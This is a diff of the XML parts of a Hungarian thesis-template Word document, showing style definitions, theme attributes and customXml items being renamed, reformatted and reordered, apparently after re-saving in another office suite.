     </w:pPr>
     <w:rPr>
       <w:sz w:val="21"/>
       <w:szCs w:val="22"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tmutatcm">
+  <w:style w:type="paragraph" w:styleId="tmutatcm" w:customStyle="1">
     <w:name w:val="Útmutató cím"/>
     <w:basedOn w:val="tmutat"/>
     <w:qFormat/>
-    <w:rsid w:val="0090541F"/>
+    <w:rsid w:val="0090541f"/>
     <w:pPr>
       <w:jc w:val="center"/>
     </w:pPr>
@@ -3544,63 +3125,66 @@
       <w:sz w:val="24"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Nyilatkozatszveg">
+  <w:style w:type="paragraph" w:styleId="Nyilatkozatszveg" w:customStyle="1">
     <w:name w:val="Nyilatkozat szöveg"/>
-    <w:basedOn w:val="Normln"/>
-    <w:qFormat/>
-    <w:rsid w:val="00854BDC"/>
-    <w:pPr>
-      <w:ind w:firstLine="0"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Nyilatkozatalrs">
+    <w:basedOn w:val="Normal"/>
+    <w:qFormat/>
+    <w:rsid w:val="00854bdc"/>
+    <w:pPr>
+      <w:ind w:hanging="0"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Nyilatkozatalrs" w:customStyle="1">
     <w:name w:val="Nyilatkozat aláírás"/>
     <w:basedOn w:val="Nyilatkozatszveg"/>
     <w:qFormat/>
-    <w:rsid w:val="00854BDC"/>
+    <w:rsid w:val="00854bdc"/>
     <w:pPr>
       <w:tabs>
-        <w:tab w:val="center" w:pos="6237"/>
+        <w:tab w:val="clear" w:pos="720"/>
+        <w:tab w:val="center" w:pos="6237" w:leader="none"/>
       </w:tabs>
-      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-      <w:ind w:left="3686"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Cmlaplog">
+      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+      <w:ind w:start="3686"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Cmlaplog" w:customStyle="1">
     <w:name w:val="Címlap logó"/>
-    <w:basedOn w:val="Normln"/>
-    <w:qFormat/>
-    <w:rsid w:val="00D429F2"/>
-    <w:pPr>
-      <w:ind w:firstLine="0"/>
+    <w:basedOn w:val="Normal"/>
+    <w:qFormat/>
+    <w:rsid w:val="00d429f2"/>
+    <w:pPr>
+      <w:ind w:hanging="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Cmlapkarstanszk">
+  <w:style w:type="paragraph" w:styleId="Cmlapkarstanszk" w:customStyle="1">
     <w:name w:val="Címlap kar és tanszék"/>
-    <w:basedOn w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
     <w:qFormat/>
     <w:rsid w:val="00171054"/>
     <w:pPr>
-      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-      <w:ind w:firstLine="0"/>
+      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+      <w:ind w:hanging="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Cmlapegyetem">
+  <w:style w:type="paragraph" w:styleId="Cmlapegyetem" w:customStyle="1">
     <w:name w:val="Címlap egyetem"/>
-    <w:basedOn w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
     <w:qFormat/>
     <w:rsid w:val="00171054"/>
     <w:pPr>
-      <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
-      <w:ind w:firstLine="0"/>
+      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="0"/>
+      <w:ind w:hanging="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
@@ -3609,20 +3193,20 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Vrazncitt">
+  <w:style w:type="paragraph" w:styleId="IntenseQuote">
     <w:name w:val="Intense Quote"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:link w:val="VrazncittChar"/>
     <w:uiPriority w:val="30"/>
     <w:qFormat/>
-    <w:rsid w:val="003F5425"/>
+    <w:rsid w:val="003f5425"/>
     <w:pPr>
       <w:pBdr>
         <w:bottom w:val="single" w:sz="4" w:space="4" w:color="4F81BD"/>
       </w:pBdr>
       <w:spacing w:before="200" w:after="280"/>
-      <w:ind w:left="936" w:right="936"/>
+      <w:ind w:start="936" w:end="936"/>
     </w:pPr>
     <w:rPr>
       <w:b/>
@@ -3632,78 +3216,89 @@
       <w:color w:val="4F81BD"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Odstavecseseznamem">
+  <w:style w:type="paragraph" w:styleId="ListParagraph">
     <w:name w:val="List Paragraph"/>
-    <w:basedOn w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
     <w:uiPriority w:val="34"/>
     <w:qFormat/>
-    <w:rsid w:val="003F5425"/>
-    <w:pPr>
-      <w:ind w:left="708"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Citt">
+    <w:rsid w:val="003f5425"/>
+    <w:pPr>
+      <w:ind w:start="708"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Quote">
     <w:name w:val="Quote"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:link w:val="CittChar"/>
     <w:uiPriority w:val="29"/>
     <w:qFormat/>
-    <w:rsid w:val="003F5425"/>
+    <w:rsid w:val="003f5425"/>
+    <w:pPr/>
     <w:rPr>
       <w:i/>
       <w:iCs/>
       <w:color w:val="000000"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Bezmezer">
+  <w:style w:type="paragraph" w:styleId="NoSpacing">
     <w:name w:val="No Spacing"/>
     <w:uiPriority w:val="1"/>
     <w:qFormat/>
-    <w:rsid w:val="003F5425"/>
-    <w:pPr>
+    <w:rsid w:val="003f5425"/>
+    <w:pPr>
+      <w:widowControl/>
+      <w:suppressAutoHyphens w:val="true"/>
+      <w:bidi w:val="0"/>
+      <w:spacing w:before="0" w:after="0"/>
       <w:ind w:firstLine="720"/>
       <w:jc w:val="both"/>
     </w:pPr>
     <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+      <w:color w:val="auto"/>
+      <w:kern w:val="0"/>
       <w:sz w:val="24"/>
       <w:szCs w:val="24"/>
-      <w:lang w:eastAsia="en-US"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Picture">
+      <w:lang w:val="hu-HU" w:eastAsia="en-US" w:bidi="ar-SA"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Picture" w:customStyle="1">
     <w:name w:val="Picture"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Titulek"/>
-    <w:qFormat/>
-    <w:rsid w:val="002841F9"/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
-      <w:ind w:firstLine="0"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Caption"/>
+    <w:qFormat/>
+    <w:rsid w:val="002841f9"/>
+    <w:pPr>
+      <w:keepNext w:val="true"/>
+      <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="120"/>
+      <w:ind w:hanging="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Code" w:customStyle="1">
     <w:name w:val="Code"/>
-    <w:basedOn w:val="Normln"/>
-    <w:qFormat/>
-    <w:rsid w:val="00225F65"/>
+    <w:basedOn w:val="Normal"/>
+    <w:qFormat/>
+    <w:rsid w:val="00225f65"/>
     <w:pPr>
       <w:tabs>
-        <w:tab w:val="left" w:pos="851"/>
-        <w:tab w:val="left" w:pos="1418"/>
-        <w:tab w:val="left" w:pos="1985"/>
-        <w:tab w:val="left" w:pos="2552"/>
-        <w:tab w:val="left" w:pos="3119"/>
-        <w:tab w:val="left" w:pos="3686"/>
-        <w:tab w:val="left" w:pos="4253"/>
-        <w:tab w:val="left" w:pos="4820"/>
-        <w:tab w:val="left" w:pos="5387"/>
-        <w:tab w:val="left" w:pos="5954"/>
+        <w:tab w:val="clear" w:pos="720"/>
+        <w:tab w:val="left" w:pos="851" w:leader="none"/>
+        <w:tab w:val="left" w:pos="1418" w:leader="none"/>
+        <w:tab w:val="left" w:pos="1985" w:leader="none"/>
+        <w:tab w:val="left" w:pos="2552" w:leader="none"/>
+        <w:tab w:val="left" w:pos="3119" w:leader="none"/>
+        <w:tab w:val="left" w:pos="3686" w:leader="none"/>
+        <w:tab w:val="left" w:pos="4253" w:leader="none"/>
+        <w:tab w:val="left" w:pos="4820" w:leader="none"/>
+        <w:tab w:val="left" w:pos="5387" w:leader="none"/>
+        <w:tab w:val="left" w:pos="5954" w:leader="none"/>
       </w:tabs>
-      <w:spacing w:before="120" w:after="240" w:line="240" w:lineRule="auto"/>
-      <w:ind w:left="284" w:firstLine="0"/>
+      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="240"/>
+      <w:ind w:hanging="0" w:start="284"/>
       <w:contextualSpacing/>
     </w:pPr>
     <w:rPr>
@@ -3711,28 +3306,31 @@
       <w:sz w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Hlavikarejstku">
+  <w:style w:type="paragraph" w:styleId="IndexHeading">
     <w:name w:val="index heading"/>
     <w:basedOn w:val="Heading"/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Nadpisobsahu">
+    <w:pPr/>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOCHeading">
     <w:name w:val="TOC Heading"/>
-    <w:basedOn w:val="Nadpis1"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Heading1"/>
+    <w:next w:val="Normal"/>
     <w:uiPriority w:val="39"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="0001192F"/>
+    <w:rsid w:val="0001192f"/>
     <w:pPr>
       <w:keepLines/>
-      <w:pageBreakBefore w:val="0"/>
+      <w:pageBreakBefore w:val="false"/>
       <w:numPr>
+        <w:ilvl w:val="0"/>
         <w:numId w:val="0"/>
       </w:numPr>
-      <w:spacing w:before="480" w:after="0" w:line="276" w:lineRule="auto"/>
+      <w:spacing w:lineRule="auto" w:line="276" w:before="480" w:after="0"/>
       <w:ind w:firstLine="720"/>
-      <w:jc w:val="left"/>
+      <w:jc w:val="start"/>
       <w:outlineLvl w:val="9"/>
     </w:pPr>
     <w:rPr>
@@ -3744,112 +3342,146 @@
       <w:lang w:eastAsia="hu-HU"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Headline">
+  <w:style w:type="paragraph" w:styleId="Headline" w:customStyle="1">
     <w:name w:val="Headline"/>
     <w:basedOn w:val="Fejezetcimszmozsnlkl"/>
-    <w:next w:val="Normln"/>
-    <w:qFormat/>
-    <w:rsid w:val="00B96880"/>
+    <w:next w:val="Normal"/>
+    <w:qFormat/>
+    <w:rsid w:val="00b96880"/>
     <w:pPr>
       <w:outlineLvl w:val="9"/>
     </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Textkomente">
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="CommentText">
     <w:name w:val="annotation text"/>
-    <w:basedOn w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
     <w:link w:val="TextkomenteChar"/>
-    <w:rsid w:val="00630A92"/>
-    <w:pPr>
-      <w:spacing w:line="240" w:lineRule="auto"/>
+    <w:rsid w:val="00630a92"/>
+    <w:pPr>
+      <w:spacing w:lineRule="auto" w:line="240"/>
     </w:pPr>
     <w:rPr>
       <w:sz w:val="20"/>
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Pedmtkomente">
+  <w:style w:type="paragraph" w:styleId="annotationsubject">
     <w:name w:val="annotation subject"/>
-    <w:basedOn w:val="Textkomente"/>
-    <w:next w:val="Textkomente"/>
+    <w:basedOn w:val="CommentText"/>
+    <w:next w:val="CommentText"/>
     <w:link w:val="PedmtkomenteChar"/>
     <w:qFormat/>
-    <w:rsid w:val="00630A92"/>
+    <w:rsid w:val="00630a92"/>
+    <w:pPr/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Bibliografie">
+  <w:style w:type="paragraph" w:styleId="Bibliography">
     <w:name w:val="Bibliography"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:uiPriority w:val="37"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="009B2EED"/>
-    <w:pPr>
-      <w:ind w:firstLine="0"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Revize">
+    <w:rsid w:val="009b2eed"/>
+    <w:pPr>
+      <w:ind w:hanging="0"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Revision">
     <w:name w:val="Revision"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:qFormat/>
-    <w:rsid w:val="0046068C"/>
-    <w:rPr>
+    <w:rsid w:val="0046068c"/>
+    <w:pPr>
+      <w:widowControl/>
+      <w:suppressAutoHyphens w:val="true"/>
+      <w:bidi w:val="0"/>
+      <w:spacing w:before="0" w:after="0"/>
+      <w:jc w:val="start"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+      <w:color w:val="auto"/>
+      <w:kern w:val="0"/>
       <w:sz w:val="24"/>
       <w:szCs w:val="24"/>
-      <w:lang w:eastAsia="en-US"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="numbering" w:customStyle="1" w:styleId="tmutat-felsorols">
+      <w:lang w:val="hu-HU" w:eastAsia="en-US" w:bidi="ar-SA"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="numbering" w:styleId="NoList" w:default="1">
+    <w:name w:val="No List"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+  </w:style>
+  <w:style w:type="numbering" w:styleId="tmutat-felsorols" w:customStyle="1">
     <w:name w:val="Útmutató - felsorolás"/>
     <w:qFormat/>
-    <w:rsid w:val="000062F4"/>
-  </w:style>
-  <w:style w:type="numbering" w:customStyle="1" w:styleId="tmutatfelsorols">
+    <w:rsid w:val="000062f4"/>
+  </w:style>
+  <w:style w:type="numbering" w:styleId="tmutatfelsorols" w:customStyle="1">
     <w:name w:val="Útmutató felsorolás"/>
     <w:qFormat/>
-    <w:rsid w:val="003A4CDB"/>
-  </w:style>
-  <w:style w:type="numbering" w:customStyle="1" w:styleId="StyleOutlinenumberedSymbolsymbol11ptBoldLeft0cm">
+    <w:rsid w:val="003a4cdb"/>
+  </w:style>
+  <w:style w:type="numbering" w:styleId="StyleOutlinenumberedSymbolsymbol11ptBoldLeft0cm" w:customStyle="1">
     <w:name w:val="Style Outline numbered Symbol (symbol) 11 pt Bold Left:  0 cm ..."/>
     <w:qFormat/>
-    <w:rsid w:val="003A4CDB"/>
-  </w:style>
-  <w:style w:type="numbering" w:customStyle="1" w:styleId="StyleOutlinenumberedSymbolsymbol11ptBoldLeft0cm1">
+    <w:rsid w:val="003a4cdb"/>
+  </w:style>
+  <w:style w:type="numbering" w:styleId="StyleOutlinenumberedSymbolsymbol11ptBoldLeft0cm1" w:customStyle="1">
     <w:name w:val="Style Outline numbered Symbol (symbol) 11 pt Bold Left:  0 cm ...1"/>
     <w:qFormat/>
-    <w:rsid w:val="003A4CDB"/>
-  </w:style>
-  <w:style w:type="numbering" w:customStyle="1" w:styleId="tmutatszmozottlista">
+    <w:rsid w:val="003a4cdb"/>
+  </w:style>
+  <w:style w:type="numbering" w:styleId="tmutatszmozottlista" w:customStyle="1">
     <w:name w:val="Útmutató számozott lista"/>
     <w:qFormat/>
-    <w:rsid w:val="00D429F2"/>
-  </w:style>
-  <w:style w:type="numbering" w:customStyle="1" w:styleId="Irodalomjegyzkttel">
+    <w:rsid w:val="00d429f2"/>
+  </w:style>
+  <w:style w:type="numbering" w:styleId="Irodalomjegyzkttel" w:customStyle="1">
     <w:name w:val="Irodalomjegyzék tétel"/>
     <w:qFormat/>
-    <w:rsid w:val="006F512E"/>
-  </w:style>
-  <w:style w:type="numbering" w:customStyle="1" w:styleId="tmutatlista">
+    <w:rsid w:val="006f512e"/>
+  </w:style>
+  <w:style w:type="numbering" w:styleId="tmutatlista" w:customStyle="1">
     <w:name w:val="Útmutató lista"/>
     <w:qFormat/>
     <w:rsid w:val="00267677"/>
+  </w:style>
+  <w:style w:type="table" w:default="1" w:styleId="Normlntabulka">
+    <w:name w:val="Normal Table"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:tblPr>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="108" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="108" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
   </w:style>
   <w:style w:type="table" w:styleId="Mkatabulky">
     <w:name w:val="Table Grid"/>
     <w:basedOn w:val="Normlntabulka"/>
-    <w:rsid w:val="002605C9"/>
+    <w:rsid w:val="002605c9"/>
     <w:tblPr>
       <w:tblBorders>
-        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+        <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+        <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+        <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+        <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+        <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
       </w:tblBorders>
     </w:tblPr>
   </w:style>
@@ -3857,17 +3489,17 @@
     <w:name w:val="Grid Table 1 Light"/>
     <w:basedOn w:val="Normlntabulka"/>
     <w:uiPriority w:val="46"/>
-    <w:rsid w:val="003512CA"/>
+    <w:rsid w:val="003512ca"/>
     <w:tblPr>
       <w:tblStyleRowBandSize w:val="1"/>
       <w:tblStyleColBandSize w:val="1"/>
       <w:tblBorders>
-        <w:top w:val="single" w:sz="4" w:space="0" w:color="999999" w:themeColor="text1" w:themeTint="66"/>
-        <w:left w:val="single" w:sz="4" w:space="0" w:color="999999" w:themeColor="text1" w:themeTint="66"/>
-        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999" w:themeColor="text1" w:themeTint="66"/>
-        <w:right w:val="single" w:sz="4" w:space="0" w:color="999999" w:themeColor="text1" w:themeTint="66"/>
-        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="999999" w:themeColor="text1" w:themeTint="66"/>
-        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="999999" w:themeColor="text1" w:themeTint="66"/>
+        <w:top w:val="single" w:color="999999" w:themeColor="text1" w:themeTint="66" w:sz="4" w:space="0"/>
+        <w:left w:val="single" w:color="999999" w:themeColor="text1" w:themeTint="66" w:sz="4" w:space="0"/>
+        <w:bottom w:val="single" w:color="999999" w:themeColor="text1" w:themeTint="66" w:sz="4" w:space="0"/>
+        <w:right w:val="single" w:color="999999" w:themeColor="text1" w:themeTint="66" w:sz="4" w:space="0"/>
+        <w:insideH w:val="single" w:color="999999" w:themeColor="text1" w:themeTint="66" w:sz="4" w:space="0"/>
+        <w:insideV w:val="single" w:color="999999" w:themeColor="text1" w:themeTint="66" w:sz="4" w:space="0"/>
       </w:tblBorders>
     </w:tblPr>
     <w:tblStylePr w:type="firstRow">
@@ -3878,7 +3510,7 @@
       <w:tblPr/>
       <w:tcPr>
         <w:tcBorders>
-          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000" w:themeColor="text1"/>
+          <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="12" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -3890,7 +3522,7 @@
       <w:tblPr/>
       <w:tcPr>
         <w:tcBorders>
-          <w:top w:val="double" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
+          <w:top w:val="double" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -3899,19 +3531,21 @@
         <w:b/>
         <w:bCs/>
       </w:rPr>
+      <w:tblPr/>
     </w:tblStylePr>
     <w:tblStylePr w:type="lastCol">
       <w:rPr>
         <w:b/>
         <w:bCs/>
       </w:rPr>
+      <w:tblPr/>
     </w:tblStylePr>
   </w:style>
 </w:styles>
 </file>
 
 <file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
-<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office-téma">
+<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="Office-téma">
   <a:themeElements>
     <a:clrScheme name="Office">
       <a:dk1>
@@ -3953,12 +3587,12 @@
     </a:clrScheme>
     <a:fontScheme name="Office">
       <a:majorFont>
-        <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
+        <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="0" charset="1"/>
         <a:ea typeface=""/>
         <a:cs typeface=""/>
       </a:majorFont>
       <a:minorFont>
-        <a:latin typeface="Calibri" panose="020F0502020204030204"/>
+        <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="0" charset="1"/>
         <a:ea typeface=""/>
         <a:cs typeface=""/>
       </a:minorFont>
@@ -3990,7 +3624,7 @@
             </a:gs>
           </a:gsLst>
           <a:lin ang="5400000" scaled="0"/>
-          <a:tileRect/>
+          <a:tileRect l="0" t="0" r="0" b="0"/>
         </a:gradFill>
         <a:gradFill>
           <a:gsLst>
@@ -4014,7 +3648,7 @@
             </a:gs>
           </a:gsLst>
           <a:lin ang="5400000" scaled="0"/>
-          <a:tileRect/>
+          <a:tileRect l="0" t="0" r="0" b="0"/>
         </a:gradFill>
       </a:fillStyleLst>
       <a:lnStyleLst>
@@ -4074,34 +3708,15 @@
             </a:gs>
           </a:gsLst>
           <a:lin ang="5400000" scaled="0"/>
-          <a:tileRect/>
+          <a:tileRect l="0" t="0" r="0" b="0"/>
         </a:gradFill>
       </a:bgFillStyleLst>
     </a:fmtScheme>
   </a:themeElements>
-  <a:objectDefaults/>
-  <a:extraClrSchemeLst/>
 </a:theme>
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="2c71b88f-36ae-449a-8a52-10e2658bdd67" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
-</file>
-
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
-</file>
-
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Dokumentum" ma:contentTypeID="0x010100804405677F68524E887B9BAD647EC267" ma:contentTypeVersion="17" ma:contentTypeDescription="Új dokumentum létrehozása." ma:contentTypeScope="" ma:versionID="76fc60fa35090df738af56597c20442c">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="2c71b88f-36ae-449a-8a52-10e2658bdd67" xmlns:ns4="ae689388-e07a-4908-9d5a-df7298fe66fc" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="b0fbbcf4c3d3a80139dc1bb83a4232cb" ns3:_="" ns4:_="">
     <xsd:import namespace="2c71b88f-36ae-449a-8a52-10e2658bdd67"/>
@@ -4348,6 +3963,23 @@
 </ct:contentTypeSchema>
 </file>
 
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
+</file>
+
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="2c71b88f-36ae-449a-8a52-10e2658bdd67" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
+</file>
+
 <file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
 <b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\IEEE2006OfficeOnline.xsl" StyleName="IEEE" Version="2006">
   <b:Source>
@@ -4548,24 +4180,6 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5283BDE5-2110-47A1-B6BF-261D767F66A4}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="2c71b88f-36ae-449a-8a52-10e2658bdd67"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BFA6786E-AF7B-4A38-BBCA-BF31ECFEA1DF}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0B5E8B16-0AFB-408B-BF8C-70E4A1B923B3}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -4584,6 +4198,24 @@
 </ds:datastoreItem>
 </file>
 
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BFA6786E-AF7B-4A38-BBCA-BF31ECFEA1DF}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5283BDE5-2110-47A1-B6BF-261D767F66A4}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
